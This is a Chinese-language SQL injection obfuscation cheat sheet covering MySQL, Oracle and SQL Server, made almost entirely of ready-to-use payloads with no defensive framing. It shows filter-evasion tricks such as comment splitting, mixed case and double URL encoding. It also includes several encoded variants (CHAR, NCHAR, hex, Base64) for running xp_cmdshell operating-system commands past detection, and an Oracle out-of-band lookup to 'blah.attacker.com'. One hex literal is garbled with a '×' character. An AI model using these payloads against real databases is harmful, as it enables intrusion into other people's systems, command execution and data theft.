注入混淆

MySQL

描述 查询语句
ASCII > 字符
SELECT char(65)
字符 > ASCII
SELECT ascii('A')
十六进制
SELECT 0x4A414B45
十六进制 > 整数
SELECT 0x20 + 0x40
非十六进制/十六进制
unhex(hex(user()))
按位与
SELECT 6 & 2
按位或
SELECT 6 | 2
按位取反
SELECT ~6
按位异或
SELECT 6 ^ 2
右移
SELECT 6>>2
左移
SELECT 6<<2
字符串

SELECT substr('abcd', 3, 2)

substr(string, index, length)

Cast

SELECT cast('1' AS unsigned integer)

SELECT cast('123' AS char)

Concat

SELECT concat('snow','wolf')

SELECT 'snow' 'wo' 'lf'

无引号
SELECT CONCAT(CHAR(74),CHAR(65),CHAR(75),CHAR(69))
注释块
SELECT/*block comment*/"test"
单行注释

注释掉该行的其余部分

SELECT 1 -- 
SELECT 1 # 
SELECT 1 --+ - 
SELECT 1 --+- - 
SELECT 1 -- - - 
SELECT 1 %00 - 

内联注释
SEL/*_*/ECT * FR/*_*/OM
无空格
SELECT(username)FROM(USERS)WHERE(username='snowwolf')
允许的空格
09, 0A, 0B, 0C, 0D, A0, 20
URL Encode
SELECT%20%2A%20FROM%20USERS
两次URL Encode
SELECT%2520%2A%2520FROM%2520USERS
无效百分比编码
%SEL%ECT * F%R%OM U%S%ERS
字符串混淆
SeLeCt * FrOm

Oracle

描述 查询语句
ASCII转字符
SELECT char(65) from dual
字符转ASCII
SELECT ascii('A') from dual
按位与
SELECT 6 & 2 from dual
按位或
SELECT 6 | 2 from dual
按位取反
SELECT ~6 from dual
按位异或
SELECT 6 ^ 2 from dual
选择指定字符
SELECT substr('abcd', 3, 1) FROM dual;
字符串
SELECT substr('abcd', 3, 2) from dual

substr(string, index, length)
Cast
select CAST(12 AS CHAR(32)) from dual
Concat
SELECT concat('net','spi') from dual
注释
SELECT 1 FROM dual --
IF语句
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
Case语句

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- Returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- Returns 2

延时

BEGIN DBMS_LOCK.SLEEP(5); END; (Requires Privileges)
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;

指定行
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;
按位与

SELECT bitand(6,2) FROM dual; -- Returns 2
SELECT bitand(6,1) FROM dual; -- Returns 0

字符串拼接
SELECT 'A' || 'B' FROM dual; -- Returns AB
规避引号
SELECT chr(65) || chr(66) FROM dual; -- Returns AB
十六进制编码
SELECT 0x75736572 FROM dual;

SQL Server

描述 查询语句
ASCII转字符
SELECT char(65)
字符转ASCII
SELECT ascii('A')
十六进制转整数
SELECT 0x20 + 0x40
按位与
SELECT 6 & 2
按位或
SELECT 6 | 2
按位取反
SELECT ~6
按位异或
SELECT 6 ^ 2
字符串

SELECT substring('abcd', 3, 2)

substring(string, index, length)

Cast

SELECT cast('1' AS unsigned integer)

SELECT cast('123' AS char)

Concat
SELECT concat('snow','wolf')
注释
SELECT 1 --comment
SELECT/*comment*/1
规避引号
SELECT char(65)+char(66) -- returns AB
规避分号
%0dwaitfor+delay+'0:0:10'--
绕过Case过滤
EXEC xP_cMdsheLL 'dir';
  • 避免空格
EXEC/**/xp_cmdshell/**/'dir';--
';ex/**/ec xp_cmds/**/hell 'dir';
  • 通过concat避免查询检测
DECLARE @cmd as varchar(3000);SET @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+""+'d'+'i'+'r'+"";exec(@cmd);
  • 通过字符编码避免查询检测
DECLARE @cmd as varchar(3000);SET @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);
  • 通过Base64规避查询检测
DECLARE @data varchar(max), @XmlData xml;SET @data = 'ZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdkaXIn';SET @XmlData = CAST('' + @data + '' as xml);SET @data = CONVERT(varchar(max), @XmlData.value('(data)[1]', 'varbinary(max)'));exec (@data);
  • 通过Nchar编码规避查询检测
DECLARE @cmd as nvarchar(3000);SET @cmd =(nchar(101)+nchar(120)+nchar(101)+nchar(99)+nchar(32)+nchar(109)+nchar(97)+nchar(115)+nchar(116)+nchar(101)+nchar(114)+nchar(46)+nchar(46)+nchar(120)+nchar(112)+nchar(95)+nchar(99)+nchar(109)+nchar(100)+nchar(115)+nchar(104)+nchar(101)+nchar(108)+nchar(108)+nchar(32)+nchar(39)+nchar(100)+nchar(105)+nchar(114)+nchar(39)+nchar(59));EXEC(@cmd);
  • 通过二进制编码ASCII+Cast来规避查询检测
DECLARE @cmd as varchar(MAX);SET @cmd = cast(0x78705F636D647368656C6C202764697227 as varchar(MAX));exec(@cmd);
  • 通过二进制编码ASCII+Convert来规避查询检测
DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(MAX),0x78705F636D647368656C6C202764697227);exec(@cmd);
  • 通过varbinary来规避查询检测
DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227);exec(@cmd);
  • 通过使用sp_sqlexec规避执行
DECLARE @cmd as varchar(3000);SET @cmd = convert(varchar(0),0×78705F636D647368656C6C202764697227);exec sp_sqlexec @cmd;
  • 执行xp_cmdshell ‘dir’
DECLARE @tmp as varchar(MAX);
SET @tmp = char(88)+char(80)+char(95)+char(67)+char(77)+char(68)+char(83)+char(72)+char(69)+char(76)+char(76);
exec @tmp 'dir';